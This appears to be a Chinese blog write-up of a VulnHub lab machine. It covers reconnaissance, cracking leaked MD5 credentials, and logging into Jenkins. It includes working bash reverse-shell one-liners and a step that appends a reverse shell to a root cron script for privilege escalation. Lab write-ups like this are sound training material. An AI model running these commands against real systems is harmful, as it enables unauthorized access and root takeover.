当前位置: 首页 > news >正文

建设网站需要注意什么问题怎么做公司logo

建设网站需要注意什么问题,怎么做公司logo,wordpress移动端导航菜单,中国十大服务外包企业🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~ ✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏…
🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

一、信息收集

1.nmap扫描

┌──(root💀kali)-[~/桌面]
└─# arp-scan -l
发现靶机IP:192.168.103.196

┌──(root💀kali)-[~/桌面]
└─# nmap -sS -A 192.168.103.196/24

扫描发现22、80、3306、8080端口

┌──(root💀kali)-[~/桌面]
└─# nmap --script=vuln -p22,80,8080 192.168.103.196--script=vuln  是nmap中的一个模块,能够扫描端口中有哪些漏洞可以利用

先登录下80端口:

没有发现什么有价值的信息

再登录下8080端口:

是个登录界面

2.目录扫描

1.扫描80端口
┌──(root💀kali)-[~/桌面]
└─# dirsearch -u http://192.168.103.196

/access.html目录:

发现了一个页面,好像是有几串加密了的字符串

┌──(root💀kali)-[~/桌面]
└─# hash-identifier 5978a63b4654c73c60fa24f836386d87 

发现是md5加密

解码工具:

MD5免费在线解密破解_MD5在线加密-SOMD5MD5在线免费破解,支持md5,sha1,mysql,sha256,sha512,md4,织梦,vBulletin,Discuz,md5(Joomla),mssql(2012),ntlm,md5(base64),sha1(base64),md5(wordpress),md5(Phpbb3),md5(Unix),des(Unix)等数十种加密方式icon-default.png?t=N7T8https://www.somd5.com/

解码之后的结果是:

tiago:5978a63b4654c73c60fa24f836386d87:italia99trindade:9b38e2b1e8b12f426b0d208a7ab6cb98:mariannaeder:f463f63616cb3f1e81ce46b39f882fd5: vipsu
2.扫描8080端口

发现了8080端口下面有一个robots.txt目录

并没有发现什么有价值的信息

二、漏洞利用

1.jenkins漏洞

大家可以上网找下这个工具的一些漏洞

三个账号密码都试下,下面的是可以正常登陆进去后台的

账号:eder
密码:vipsu

2.反弹shell

反弹shell木马

bash -i >& /dev/tcp/192.168.103.129/9999 0>&1

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 9999
bash -i >& /dev/tcp/192.168.103.129/9999 0>&1

三、提权

1.信息收集

就root和eder(目前登录的账号)有提权机会

bash-4.2$ cat /etc/passwd

没有查看密码的权限,这条路说明走不通

cat /etc/shadow

2.查看历史进程

cat /etc/crontab

说明我们可以追加一个木马进去,然后五分钟可以反弹到root权限

echo "bash -i >& /dev/tcp/192.168.103.129/44 0>&1" >> /etc/script/CleaningScript.sh

可以看到反弹成功了

3.flag

大概就是说,恭喜你拿到了最高权限

http://www.yayakq.cn/news/496867/

相关文章:

  • 福州网站设计定制公司下载asp网站
  • 随州公司做网站电子商务网站进度的基本流程
  • 有没有学做蛋糕的网站和视频威海网站建设公司哪家好
  • 河南网站设计价格标题优化怎么做
  • 如何做镜框 网站网站制作 p
  • 石家庄网站推广排名百度主页面
  • 郑州艾特软件 网站建设网页设计教程
  • idc自动续费网站源码沈阳建设工程招投标网
  • 百度收录网站要多郑州高端网站公司
  • 文山建设局网站东莞营销推广服务
  • 电脑上如何做网站宣传用php做企业网站的可行性
  • 营销型网站策划 pdf破解版WordPress主题
  • 昆明网站搭建多少钱进口彩妆做的好的网站
  • 预付网站建设费用会计分录夜狼seo
  • 怎么在阿里巴巴网站做公司仿网易考拉网站建设
  • 深圳品牌网站建设公司排名做网站需要用什么开发软件
  • 网站ppt缩略图建立有效的()
  • 海南网站建设中心深圳高端平台
  • 武进区城乡建设局网站wordpress在线题库
  • 上海官网建设昆明官网seo技术
  • 上海做网站优化哪家好免费推广网站入口2023
  • 网站广告是内容营销吗越南注册公司需要什么条件
  • 手机单页网站模板寒假网页设计培训珿
  • 中国建设机械教育网官方网站wordpress 更换中文字体
  • wix建设网站教程中国建设银行个人登录
  • 陕西住房和城乡建设部网站首页wordpress文章添加目录
  • 网络建站东北企业网络规划设计与实现
  • esp8266做网站天津网站建站推广
  • 营业执照办好了就可以做网站了吗ccyy切换路线专线
  • 上海家居网站建设双流兴城投资建设有限公司网站